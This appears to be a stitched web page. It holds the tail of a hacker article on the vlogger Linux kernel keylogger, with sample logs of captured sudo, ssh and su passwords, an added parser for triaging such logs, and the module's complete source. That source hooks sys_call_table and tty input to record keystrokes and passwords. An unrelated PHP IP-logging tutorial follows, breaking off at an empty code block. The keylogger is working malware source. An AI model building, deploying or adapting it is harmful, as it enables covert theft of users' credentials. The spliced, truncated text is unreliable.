---in dumb mode
[root@localhost log]# head tty2          // local session
<19/06/2002-20:53:47 uid=501 bash> pwd
<19/06/2002-20:53:51 uid=501 bash> uname -a
<19/06/2002-20:53:53 uid=501 bash> lsmod
<19/06/2002-20:53:56 uid=501 bash> pwd
<19/06/2002-20:54:05 uid=501 bash> cd /var/log
<19/06/2002-20:54:13 uid=501 bash> tail messages
<19/06/2002-20:54:21 uid=501 bash> cd ~
<19/06/2002-20:54:22 uid=501 bash> ls
<19/06/2002-20:54:29 uid=501 bash> tty
<19/06/2002-20:54:29 uid=501 bash> [UP]

[root@localhost log]# tail pts11         // remote session
<19/06/2002-18:48:27 uid=0 bash> cd new
<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
<19/06/2002-18:48:21 uid=0 bash> lsmod
<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
<19/06/2002-18:48:28 uid=0 bash> ls -l
<19/06/2002-18:48:30 uid=0 bash> tail pts11
<19/06/2002-18:48:38 uid=0 bash> [UP] | more
<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
<19/06/2002-18:50:48 uid=0 vi> :q
<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger

---in smart mode
[root@localhost log]# cat pass.log
[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
USER/CMD sudo traceroute yahoo.com
PASS 5hgt6d
PASS

[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
USER/CMD ssh guest@host.com
PASS guest

[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
USER/CMD open ftp.ilog.fr
USER Anonymous
PASS heh@heh

[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
USER/CMD su -
PASS asdf1234

Please check http://www.thehackerschoice.com/ for updates on the new
version of this tool.
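
For incident response, when a pass.log in the layout shown above turns up on a host, the first question is which sessions and accounts had credentials captured so they can be rotated. The following is an added example, not part of the original article or of vlogger: a triage parser for that layout that records time, tty, uid, program and the USER/CMD text per record and only counts the PASS lines without keeping their values. The sample input is constructed and its secrets are placeholders.

```c
#include <stdio.h>
#include <string.h>

struct exposure {
    char when[20];     /* DD/MM/YYYY-HH:MM:SS as written by the logger */
    char tty[16];
    int  uid;          /* -1 when the header has no uid field */
    char comm[16];     /* program that was reading the tty */
    char target[64];   /* text of the USER/CMD line */
    int  secrets;      /* non-empty PASS lines; their values are dropped */
};

/* Constructed sample in the pass.log layout; secrets are placeholders. */
static const char SAMPLE_PASS_LOG[] =
    "\n[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]\n"
    "USER/CMD sudo traceroute yahoo.com\n"
    "PASS placeholder-1\n"
    "PASS \n"
    "\n[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]\n"
    "USER/CMD ssh guest@host.com\n"
    "PASS placeholder-2\n"
    "\n[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]\n"
    "USER/CMD open ftp.ilog.fr\n"
    "USER Anonymous\n"
    "PASS placeholder-3\n"
    "\n[19/06/2002-21:02:10 tty=tty/1]\n"
    "USER/CMD root\n"
    "PASS placeholder-4\n";

/* Copy the next line (without its newline) into buf; returns 0 at the end. */
static int next_line(const char **p, char *buf, size_t cap)
{
    const char *s = *p, *e;
    size_t n;

    if (*s == '\0')
        return 0;
    e = strchr(s, '\n');
    n = e ? (size_t)(e - s) : strlen(s);
    *p = e ? e + 1 : s + n;
    if (n >= cap)
        n = cap - 1;               /* truncate over-long lines */
    memcpy(buf, s, n);
    buf[n] = '\0';
    return 1;
}

/* Parse pass.log text into at most cap records; returns the record count. */
size_t parse_pass_log(const char *text, struct exposure *out, size_t cap)
{
    char line[512];
    struct exposure *cur = NULL;
    size_t n = 0;

    while (next_line(&text, line, sizeof line)) {
        if (line[0] == '[') {
            struct exposure e;

            memset(&e, 0, sizeof e);
            /* Header with task info: [time tty=name/num uid=N comm] */
            if (sscanf(line, "[%19[^ ] tty=%15[^ ] uid=%d %15[^]]",
                       e.when, e.tty, &e.uid, e.comm) != 4) {
                /* Header written when no task was found: [time tty=name/num] */
                e.uid = -1;
                e.comm[0] = '\0';
                if (sscanf(line, "[%19[^ ] tty=%15[^]]", e.when, e.tty) != 2) {
                    cur = NULL;    /* not a record header */
                    continue;
                }
            }
            if (n == cap) {        /* output array is full */
                cur = NULL;
                continue;
            }
            out[n] = e;
            cur = &out[n++];
        } else if (cur && strncmp(line, "USER/CMD ", 9) == 0) {
            snprintf(cur->target, sizeof cur->target, "%s", line + 9);
        } else if (cur && strncmp(line, "PASS", 4) == 0) {
            const char *v = line + 4;

            while (*v == ' ')
                v++;
            if (*v)                /* count it, never store it */
                cur->secrets++;
        }
        /* Other lines (blank lines, "USER ...") are ignored. */
    }
    return n;
}

int main(void)
{
    struct exposure rec[16];
    size_t i, n = parse_pass_log(SAMPLE_PASS_LOG, rec, 16);

    for (i = 0; i < n; i++)
        printf("%s %-7s uid=%-4d %-5s secrets=%d  %s\n", rec[i].when,
               rec[i].tty, rec[i].uid, rec[i].comm, rec[i].secrets,
               rec[i].target);
    return 0;
}
```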

--[ 5 - Greets

M.A.B. greets you, thanks for reading this document.

--[ 6 - Keylogger sources

<++> vlogger/Makefile
#
#  vlogger 1.0 by rd
#
#  LOCAL_ONLY    logging local session only. Doesn't intercept
#                sys_open system call
#  DEBUG         Enable debug. Turn on this options will slow
#                down your system
#

KERNELDIR =/usr/src/linux
include $(KERNELDIR)/.config
MODVERFILE = $(KERNELDIR)/include/linux/modversions.h

MODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONS
CFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \
-Wstrict-prototypes -fomit-frame-pointer -pipe \
-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \
-malign-functions=2

all : vlogger.o

vlogger.o: vlogger.c
	$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@

clean:
	rm -f *.o
<-->
<++> vlogger/vlogger.c
/*
* vlogger 1.0
*
* Copyright (C) 2002 rd <rd@vnsecurity.net>
*
* Please check http://www.thehackerschoice.com/ for update
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* Greets to THC & vnsecurity
*
*/

#define __KERNEL_SYSCALLS__
#include <linux/version.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/smp_lock.h>
#include <linux/sched.h>
#include <linux/unistd.h>
#include <linux/string.h>
#include <linux/file.h>
#include <asm/uaccess.h>
#include <linux/proc_fs.h>
#include <asm/errno.h>
#include <asm/io.h>

#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
MODULE_LICENSE("GPL");
MODULE_AUTHOR("rd@vnsecurity.net");
#endif

#define MODULE_NAME "vlogger "
#define MVERSION "vlogger 1.0 - by rd@vnsecurity.net\n"

#ifdef DEBUG
#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)
#else
#define DPRINT(format, args...)
#endif

#define N_TTY_NAME "tty"
#define N_PTS_NAME "pts"
#define MAX_TTY_CON 8
#define MAX_PTS_CON 256
#define LOG_DIR "/tmp/log"
#define PASS_LOG LOG_DIR "/pass.log"

#define TIMEZONE 7*60*60 // GMT+7

#define ESC_CHAR 27
#define BACK_SPACE_CHAR1 127 // local
#define BACK_SPACE_CHAR2 8 // remote

#define VK_TOGLE_CHAR 29 // CTRL-]
#define MAGIC_PASS "31337" // to switch mode, press MAGIC_PASS and
// VK_TOGLE_CHAR

#define VK_NORMAL 0
#define VK_DUMBMODE 1
#define VK_SMARTMODE 2
#define DEFAULT_MODE VK_DUMBMODE

#define MAX_BUFFER 256
#define MAX_SPECIAL_CHAR_SZ 12

#define TTY_NUMBER(tty) MINOR((tty)->device) - (tty)->driver.minor_start \
+ (tty)->driver.name_base
#define TTY_INDEX(tty) tty->driver.type == \
TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \
TTY_NUMBER(tty):TTY_NUMBER(tty)
#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)
#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \
buf, count)

#define TTY_NAME(tty) (tty->driver.type == \
TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \
tty->driver.type == TTY_DRIVER_TYPE_PTY && \
tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:"")

#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());
#define END_KMEM set_fs(old_fs); }

extern void *sys_call_table[];
int errno;

struct tlogger {
struct tty_struct *tty;
char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];
int lastpos;
int status;
int pass;
};

struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };
void (*old_receive_buf)(struct tty_struct *, const unsigned char *,
char *, int);
asmlinkage int (*original_sys_open)(const char *, int, int);

int vlogger_mode = DEFAULT_MODE;

/* Prototypes */
static inline void init_tty(struct tty_struct *, int);

/*
static char *_tty_make_name(struct tty_struct *tty,
const char *name, char *buf)
{
int idx = (tty)?MINOR(tty->device) - tty->driver.minor_start:0;

if (!tty)
strcpy(buf, "NULL tty");
else
sprintf(buf, name,
idx + tty->driver.name_base);
return buf;
}

char *tty_name(struct tty_struct *tty, char *buf)
{
return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);
}
*/

#define SECS_PER_HOUR  (60 * 60)
#define SECS_PER_DAY   (SECS_PER_HOUR * 24)
#define isleap(year) \
((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))
#define DIV(a, b) ((a) / (b) - ((a) % (b) < 0))
#define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400))

struct vtm {
int tm_sec;
int tm_min;
int tm_hour;
int tm_mday;
int tm_mon;
int tm_year;
};

/*
* Convert from epoch to date
*/

int epoch2time (const time_t *t, long int offset, struct vtm *tp)
{
static const unsigned short int mon_yday[2][13] = {
/* Normal years.  */
{ 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },
/* Leap years.  */
{ 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }
};

long int days, rem, y;
const unsigned short int *ip;

days = *t / SECS_PER_DAY;
rem = *t % SECS_PER_DAY;
rem += offset;
while (rem < 0) {
rem += SECS_PER_DAY;
--days;
}
while (rem >= SECS_PER_DAY) {
rem -= SECS_PER_DAY;
++days;
}
tp->tm_hour = rem / SECS_PER_HOUR;
rem %= SECS_PER_HOUR;
tp->tm_min = rem / 60;
tp->tm_sec = rem % 60;
y = 1970;

while (days < 0 || days >= (isleap (y) ? 366 : 365)) {
long int yg = y + days / 365 - (days % 365 < 0);
days -= ((yg - y) * 365
+ LEAPS_THRU_END_OF (yg - 1)
- LEAPS_THRU_END_OF (y - 1));
y = yg;
}
tp->tm_year = y - 1900;
if (tp->tm_year != y - 1900)
return 0;
ip = mon_yday[isleap(y)];
for (y = 11; days < (long int) ip[y]; --y)
continue;
days -= ip[y];
tp->tm_mon = y;
tp->tm_mday = days + 1;
return 1;
}

/*
* Get current date & time
*/

void get_time (char *date_time)
{
struct timeval tv;
time_t t;
struct vtm tm;

do_gettimeofday(&tv);
t = (time_t)tv.tv_sec;

epoch2time(&t, TIMEZONE, &tm);

sprintf(date_time, "%.2d/%.2d/%d-%.2d:%.2d:%.2d", tm.tm_mday,
tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min,
tm.tm_sec);
}

/*
* Get task structure from pgrp id
*/

inline struct task_struct *get_task(pid_t pgrp)
{
struct task_struct *task = current;

do {
if (task->pgrp == pgrp) {
return task;
}
task = task->next_task;
} while (task != current);
return NULL;
}

#define _write(f, buf, sz) (f->f_op->write(f, buf, sz, &f->f_pos))
#define WRITABLE(f) (f->f_op && f->f_op->write)

int write_to_file(char *logfile, char *buf, int size)
{
int ret = 0;
struct file  *f = NULL;

lock_kernel();
BEGIN_KMEM;
f = filp_open(logfile, O_CREAT|O_APPEND, 00600);

if (IS_ERR(f)) {
DPRINT("Error %ld opening %s\n", -PTR_ERR(f), logfile);
ret = -1;
} else {
if (WRITABLE(f))
_write(f, buf, size);
else {
DPRINT("%s does not have a write method\n",
logfile);
ret = -1;
}

if ((ret = filp_close(f,NULL)))
DPRINT("Error %d closing %s\n", -ret, logfile);
}
END_KMEM;
unlock_kernel();

return ret;
}

#define BEGIN_ROOT { int saved_fsuid = current->fsuid; current->fsuid = 0;
#define END_ROOT current->fsuid = saved_fsuid; }

/*
* Logging keystrokes
*/

void logging(struct tty_struct *tty, struct tlogger *tmp, int cont)
{
int i;

char logfile[256];
char loginfo[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ + 256];
char date_time[24];
struct task_struct *task;

if (vlogger_mode == VK_NORMAL)
return;

if ((vlogger_mode == VK_SMARTMODE) && (!tmp->lastpos || cont))
return;

task = get_task(tty->pgrp);

for (i=0; i<tmp->lastpos; i++)
if (tmp->buf[i] == 0x0D) tmp->buf[i] = 0x0A;

if (!cont)
tmp->buf[tmp->lastpos++] = 0x0A;

tmp->buf[tmp->lastpos] = 0;

if (vlogger_mode == VK_DUMBMODE) {
snprintf(logfile, sizeof(logfile)-1, "%s/%s%d",
LOG_DIR, TTY_NAME(tty),TTY_NUMBER(tty));
BEGIN_ROOT
if (!tmp->status) {
get_time(date_time);
if (task)
snprintf(loginfo, sizeof(loginfo)-1,
"<%s uid=%d %s> %s", date_time,
task->uid, task->comm, tmp->buf);
else
snprintf(loginfo, sizeof(loginfo)-1,
"<%s> %s", date_time, tmp->buf);

write_to_file(logfile, loginfo, strlen(loginfo));
} else {
write_to_file(logfile, tmp->buf, tmp->lastpos);
}
END_ROOT

#ifdef DEBUG
if (task)
DPRINT("%s/%d uid=%d %s: %s",
TTY_NAME(tty), TTY_NUMBER(tty),
task->uid, task->comm, tmp->buf);
else
DPRINT("%s", tmp->buf);
#endif
tmp->status = cont;

} else {

/*
* Logging USER/CMD and PASS in SMART_MODE
*/

BEGIN_ROOT
if (!tmp->pass) {
get_time(date_time);
if (task)
snprintf(loginfo, sizeof(loginfo)-1,
"\n[%s tty=%s/%d uid=%d %s]\n"
"USER/CMD %s", date_time,
TTY_NAME(tty),TTY_NUMBER(tty),
task->uid, task->comm, tmp->buf);
else
snprintf(loginfo, sizeof(loginfo)-1,
"\n[%s tty=%s/%d]\nUSER/CMD %s",
date_time, TTY_NAME(tty),
TTY_NUMBER(tty), tmp->buf);

write_to_file(PASS_LOG, loginfo, strlen(loginfo));
} else {
snprintf(loginfo, sizeof(loginfo)-1, "PASS %s",
tmp->buf);
write_to_file (PASS_LOG, loginfo, strlen(loginfo));
}

END_ROOT

#ifdef DEBUG
if (!tmp->pass)
DPRINT("USER/CMD %s", tmp->buf);
else
DPRINT("PASS %s", tmp->buf);
#endif
}

if (!cont) tmp->buf[--tmp->lastpos] = 0;
}

#define resetbuf(t)\
{\
t->buf[0] = 0;\
t->lastpos = 0;\
}

#define append_c(t, s, n)\
{\
t->lastpos += n;\
strncat(t->buf, s, n);\
}

static inline void reset_all_buf(void)
{
int i = 0;
for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++)
if (ttys[i] != NULL)
resetbuf(ttys[i]);
}

void special_key(struct tlogger *tmp, const unsigned char *cp, int count)
{
switch(count) {
case 2:
switch(cp[1]) {
case '\'':
append_c(tmp, "[ALT-\']", 7);
break;
case ',':
append_c(tmp, "[ALT-,]", 7);
break;
case '-':
append_c(tmp, "[ALT--]", 7);
break;
case '.':
append_c(tmp, "[ALT-.]", 7);
break;
case '/':
append_c(tmp, "[ALT-/]", 7);
break;
case '0':
append_c(tmp, "[ALT-0]", 7);
break;
case '1':
append_c(tmp, "[ALT-1]", 7);
break;
case '2':
append_c(tmp, "[ALT-2]", 7);
break;
case '3':
append_c(tmp, "[ALT-3]", 7);
break;
case '4':
append_c(tmp, "[ALT-4]", 7);
break;
case '5':
append_c(tmp, "[ALT-5]", 7);
break;
case '6':
append_c(tmp, "[ALT-6]", 7);
break;
case '7':
append_c(tmp, "[ALT-7]", 7);
break;
case '8':
append_c(tmp, "[ALT-8]", 7);
break;
case '9':
append_c(tmp, "[ALT-9]", 7);
break;
case ';':
append_c(tmp, "[ALT-;]", 7);
break;
case '=':
append_c(tmp, "[ALT-=]", 7);
break;
case '[':
append_c(tmp, "[ALT-[]", 7);
break;
case '\\':
append_c(tmp, "[ALT-\\]", 7);
break;
case ']':
append_c(tmp, "[ALT-]]", 7);
break;
case '`':
append_c(tmp, "[ALT-`]", 7);
break;
case 'a':
append_c(tmp, "[ALT-A]", 7);
break;
case 'b':
append_c(tmp, "[ALT-B]", 7);
break;
case 'c':
append_c(tmp, "[ALT-C]", 7);
break;
case 'd':
append_c(tmp, "[ALT-D]", 7);
break;
case 'e':
append_c(tmp, "[ALT-E]", 7);
break;
case 'f':
append_c(tmp, "[ALT-F]", 7);
break;
case 'g':
append_c(tmp, "[ALT-G]", 7);
break;
case 'h':
append_c(tmp, "[ALT-H]", 7);
break;
case 'i':
append_c(tmp, "[ALT-I]", 7);
break;
case 'j':
append_c(tmp, "[ALT-J]", 7);
break;
case 'k':
append_c(tmp, "[ALT-K]", 7);
break;
case 'l':
append_c(tmp, "[ALT-L]", 7);
break;
case 'm':
append_c(tmp, "[ALT-M]", 7);
break;
case 'n':
append_c(tmp, "[ALT-N]", 7);
break;
case 'o':
append_c(tmp, "[ALT-O]", 7);
break;
case 'p':
append_c(tmp, "[ALT-P]", 7);
break;
case 'q':
append_c(tmp, "[ALT-Q]", 7);
break;
case 'r':
append_c(tmp, "[ALT-R]", 7);
break;
case 's':
append_c(tmp, "[ALT-S]", 7);
break;
case 't':
append_c(tmp, "[ALT-T]", 7);
break;
case 'u':
append_c(tmp, "[ALT-U]", 7);
break;
case 'v':
append_c(tmp, "[ALT-V]", 7);
break;
case 'x':
append_c(tmp, "[ALT-X]", 7);
break;
case 'y':
append_c(tmp, "[ALT-Y]", 7);
break;
case 'z':
append_c(tmp, "[ALT-Z]", 7);
break;
}
break;
case 3:
switch(cp[2]) {
case 68:
// Left: 27 91 68
append_c(tmp, "[LEFT]", 6);
break;
case 67:
// Right: 27 91 67
append_c(tmp, "[RIGHT]", 7);
break;
case 65:
// Up: 27 91 65
append_c(tmp, "[UP]", 4);
break;
case 66:
// Down: 27 91 66
append_c(tmp, "[DOWN]", 6);
break;
case 80:
// Pause/Break: 27 91 80
append_c(tmp, "[BREAK]", 7);
break;
}
break;
case 4:
switch(cp[3]) {
case 65:
// F1: 27 91 91 65
append_c(tmp, "[F1]", 4);
break;
case 66:
// F2: 27 91 91 66
append_c(tmp, "[F2]", 4);
break;
case 67:
// F3: 27 91 91 67
append_c(tmp, "[F3]", 4);
break;
case 68:
// F4: 27 91 91 68
append_c(tmp, "[F4]", 4);
break;
case 69:
// F5: 27 91 91 69
append_c(tmp, "[F5]", 4);
break;
case 126:
switch(cp[2]) {
case 53:
// PgUp: 27 91 53 126
append_c(tmp, "[PgUP]", 6);
break;
case 54:
// PgDown: 27 91 54 126
append_c(tmp,
"[PgDOWN]", 8);
break;
case 49:
// Home: 27 91 49 126
append_c(tmp, "[HOME]", 6);
break;
case 52:
// End: 27 91 52 126
append_c(tmp, "[END]", 5);
break;
case 50:
// Insert: 27 91 50 126
append_c(tmp, "[INS]", 5);
break;
case 51:
// Delete: 27 91 51 126
append_c(tmp, "[DEL]", 5);
break;
}
break;
}
break;
case 5:
if(cp[2] == 50)
switch(cp[3]) {
case 48:
// F9: 27 91 50 48 126
append_c(tmp, "[F9]", 4);
break;
case 49:
// F10: 27 91 50 49 126
append_c(tmp, "[F10]", 5);
break;
case 51:
// F11: 27 91 50 51 126
append_c(tmp, "[F11]", 5);
break;
case 52:
// F12: 27 91 50 52 126
append_c(tmp, "[F12]", 5);
break;
case 53:
// Shift-F1: 27 91 50 53 126
append_c(tmp, "[SH-F1]", 7);
break;
case 54:
// Shift-F2: 27 91 50 54 126
append_c(tmp, "[SH-F2]", 7);
break;
case 56:
// Shift-F3: 27 91 50 56 126
append_c(tmp, "[SH-F3]", 7);
break;
case 57:
// Shift-F4: 27 91 50 57 126
append_c(tmp, "[SH-F4]", 7);
break;
}
else
switch(cp[3]) {
case 55:
// F6: 27 91 49 55 126
append_c(tmp, "[F6]", 4);
break;
case 56:
// F7: 27 91 49 56 126
append_c(tmp, "[F7]", 4);
break;
case 57:
// F8: 27 91 49 57 126
append_c(tmp, "[F8]", 4);
break;
case 49:
// Shift-F5: 27 91 51 49 126
append_c(tmp, "[SH-F5]", 7);
break;
case 50:
// Shift-F6: 27 91 51 50 126
append_c(tmp, "[SH-F6]", 7);
break;
case 51:
// Shift-F7: 27 91 51 51 126
append_c(tmp, "[SH-F7]", 7);
break;
case 52:
// Shift-F8: 27 91 51 52 126
append_c(tmp, "[SH-F8]", 7);
break;
};
break;
default:// Unknown
break;
}
}

/*
* Called whenever user press a key
*/

void vlogger_process(struct tty_struct *tty,
const unsigned char *cp, int count)
{
struct tlogger *tmp = ttys[TTY_INDEX(tty)];

if (!tmp) {
DPRINT("erm .. unknow error???\n");
init_tty(tty, TTY_INDEX(tty));
tmp = ttys[TTY_INDEX(tty)];
if (!tmp)
return;
}

if (vlogger_mode == VK_SMARTMODE) {
if (tmp->status && !IS_PASSWD(tty)) {
resetbuf(tmp);
}
if (!tmp->pass && IS_PASSWD(tty)) {
logging(tty, tmp, 0);
resetbuf(tmp);
}
if (tmp->pass && !IS_PASSWD(tty)) {
if (!tmp->lastpos)
logging(tty, tmp, 0);
resetbuf(tmp);
}
tmp->pass  = IS_PASSWD(tty);
tmp->status = 0;
}

if ((count + tmp->lastpos) > MAX_BUFFER - 1) {
logging(tty, tmp, 1);
resetbuf(tmp);
}

if (count == 1) {
if (cp[0] == VK_TOGLE_CHAR) {
if (!strcmp(tmp->buf, MAGIC_PASS)) {
if(vlogger_mode < 2)
vlogger_mode++;
else
vlogger_mode = 0;
reset_all_buf();

switch(vlogger_mode) {
case VK_DUMBMODE:
DPRINT("Dumb Mode\n");
TTY_WRITE(tty, "\r\n"
"Dumb Mode\n", 12);
break;
case VK_SMARTMODE:
DPRINT("Smart Mode\n");
TTY_WRITE(tty, "\r\n"
"Smart Mode\n", 13);
break;
case VK_NORMAL:
DPRINT("Normal Mode\n");
TTY_WRITE(tty, "\r\n"
"Normal Mode\n", 14);
}
}
}

switch (cp[0]) {
case 0x01://^A
append_c(tmp, "[^A]", 4);
break;
case 0x02://^B
append_c(tmp, "[^B]", 4);
break;
case 0x03://^C
append_c(tmp, "[^C]", 4);
case 0x04://^D
append_c(tmp, "[^D]", 4);
case 0x0D://^M
case 0x0A:
if (vlogger_mode == VK_SMARTMODE) {
if (IS_PASSWD(tty)) {
logging(tty, tmp, 0);
resetbuf(tmp);
} else
tmp->status = 1;
} else {
logging(tty, tmp, 0);
resetbuf(tmp);
}
break;
case 0x05://^E
append_c(tmp, "[^E]", 4);
break;
case 0x06://^F
append_c(tmp, "[^F]", 4);
break;
case 0x07://^G
append_c(tmp, "[^G]", 4);
break;
case 0x09://TAB - ^I
append_c(tmp, "[TAB]", 5);
break;
case 0x0b://^K
append_c(tmp, "[^K]", 4);
break;
case 0x0c://^L
append_c(tmp, "[^L]", 4);
break;
case 0x0e://^E
append_c(tmp, "[^E]", 4);
break;
case 0x0f://^O
append_c(tmp, "[^O]", 4);
break;
case 0x10://^P
append_c(tmp, "[^P]", 4);
break;
case 0x11://^Q
append_c(tmp, "[^Q]", 4);
break;
case 0x12://^R
append_c(tmp, "[^R]", 4);
break;
case 0x13://^S
append_c(tmp, "[^S]", 4);
break;
case 0x14://^T
append_c(tmp, "[^T]", 4);
break;
case 0x15://CTRL-U
resetbuf(tmp);
break;
case 0x16://^V
append_c(tmp, "[^V]", 4);
break;
case 0x17://^W
append_c(tmp, "[^W]", 4);
break;
case 0x18://^X
append_c(tmp, "[^X]", 4);
break;
case 0x19://^Y
append_c(tmp, "[^Y]", 4);
break;
case 0x1a://^Z
append_c(tmp, "[^Z]", 4);
break;
case 0x1c://^\
append_c(tmp, "[^\\]", 4);
break;
case 0x1d://^]
append_c(tmp, "[^]]", 4);
break;
case 0x1e://^^
append_c(tmp, "[^^]", 4);
break;
case 0x1f://^_
append_c(tmp, "[^_]", 4);
break;
case BACK_SPACE_CHAR1:
case BACK_SPACE_CHAR2:
if (!tmp->lastpos) break;
if (tmp->buf[tmp->lastpos-1] != ']')
tmp->buf[--tmp->lastpos] = 0;
else {
append_c(tmp, "[^H]", 4);
}
break;
case ESC_CHAR://ESC
append_c(tmp, "[ESC]", 5);
break;
default:
tmp->buf[tmp->lastpos++] = cp[0];
tmp->buf[tmp->lastpos] = 0;
}
} else {// a block of chars or special key
if (cp[0] != ESC_CHAR) {
while (count >= MAX_BUFFER) {
append_c(tmp, cp, MAX_BUFFER);
logging(tty, tmp, 1);
resetbuf(tmp);
count -= MAX_BUFFER;
cp += MAX_BUFFER;
}

append_c(tmp, cp, count);
} else // special key
special_key(tmp, cp, count);
}
}

void my_tty_open(void)
{
int fd, i;
char dev_name[80];

#ifdef LOCAL_ONLY
int fl = 0;
struct tty_struct * tty;
struct file * file;
#endif

for (i=1; i<MAX_TTY_CON; i++) {
snprintf(dev_name, sizeof(dev_name)-1, "/dev/tty%d", i);

BEGIN_KMEM
fd = open(dev_name, O_RDONLY, 0);
if (fd < 0) continue;

#ifdef LOCAL_ONLY
file = fget(fd);
tty = file->private_data;
if (tty != NULL  &&
tty->ldisc.receive_buf != NULL) {
if (!fl) {
old_receive_buf =
tty->ldisc.receive_buf;
fl = 1;
}
init_tty(tty, TTY_INDEX(tty));
}
fput(file);
#endif

close(fd);
END_KMEM
}

#ifndef LOCAL_ONLY
for (i=0; i<MAX_PTS_CON; i++) {
snprintf(dev_name, sizeof(dev_name)-1, "/dev/pts/%d", i);

BEGIN_KMEM
fd = open(dev_name, O_RDONLY, 0);
if (fd >= 0) close(fd);
END_KMEM
}
#endif

}

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
if (!tty->real_raw && !tty->raw)// ignore raw mode
vlogger_process(tty, cp, count);
(*old_receive_buf)(tty, cp, fp, count);
}

static inline void init_tty(struct tty_struct *tty, int tty_index)
{
struct tlogger *tmp;

DPRINT("Init logging for %s%d\n", TTY_NAME(tty), TTY_NUMBER(tty));

if (ttys[tty_index] == NULL) {
tmp = kmalloc(sizeof(struct tlogger), GFP_KERNEL);
if (!tmp) {
DPRINT("kmalloc failed!\n");
return;
}
memset(tmp, 0, sizeof(struct tlogger));
tmp->tty = tty;
tty->ldisc.receive_buf = new_receive_buf;
ttys[tty_index] = tmp;
} else {
tmp = ttys[tty_index];
logging(tty, tmp, 1);
resetbuf(tmp);
tty->ldisc.receive_buf = new_receive_buf;
}
}

asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{
int ret;
static int fl = 0;
struct file * file;

ret = (*original_sys_open)(filename, flags, mode);

if (ret >= 0) {
struct tty_struct * tty;

BEGIN_KMEM
lock_kernel();
file = fget(ret);
tty = file->private_data;

if (tty != NULL &&
((tty->driver.type == TTY_DRIVER_TYPE_CONSOLE &&
TTY_NUMBER(tty) < MAX_TTY_CON - 1 ) ||
(tty->driver.type == TTY_DRIVER_TYPE_PTY &&
tty->driver.subtype == PTY_TYPE_SLAVE &&
TTY_NUMBER(tty) < MAX_PTS_CON)) &&
tty->ldisc.receive_buf != NULL &&
tty->ldisc.receive_buf != new_receive_buf) {

if (!fl) {
old_receive_buf = tty->ldisc.receive_buf;
fl = 1;
}
init_tty(tty, TTY_INDEX(tty));
}
fput(file);
unlock_kernel();
END_KMEM
}
return ret;
}

int init_module(void)
{

DPRINT(MVERSION);
#ifndef LOCAL_ONLY
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;
#endif
my_tty_open();
//MOD_INC_USE_COUNT;

return 0;
}

DECLARE_WAIT_QUEUE_HEAD(wq);

void cleanup_module(void)
{
int i;

#ifndef LOCAL_ONLY
sys_call_table[__NR_open] = original_sys_open;
#endif

for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
if (ttys[i] != NULL) {
ttys[i]->tty->ldisc.receive_buf = old_receive_buf;
}
}
sleep_on_timeout(&wq, HZ);
for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
if (ttys[i] != NULL) {
kfree(ttys[i]);
}
}
DPRINT("Unloaded\n");
}

EXPORT_NO_SYMBOLS;
<-->

IP Logger

March 3, 2007

#####################
# IP Logger         #
# By b3nx30         #
# 9/4/04            #
# Programming – PHP #
#####################

To log visitors' IP addresses on your site, do the following:

1. Create a file called log.php
2. Put this code in log.php and save it:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$fp = fopen("ip.txt", "a");
fputs($fp, "$ip\n");
fclose($fp);
?>

3. Create a file called ip.txt
4. Upload the files and CHMOD ip.txt to 0666
5. Put this code at the top of the page (above the <html> tag) whose visitors' IPs you want to log:

<?php include("log.php"); ?>

To view the log, simply go to yourwebsite.com/ip.txt

Obviously, the page you want to log IP addresses from has to be a PHP page, or the
include code will not work!!
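
The steps above leave ip.txt world-writable inside the web root and readable by anyone who requests /ip.txt. The variant of log.php below keeps the same behaviour without those two exposures; it is an added example, not b3nx30's code, and the LOG_FILE path and the log_visitor() helper are assumed names.

```php
<?php
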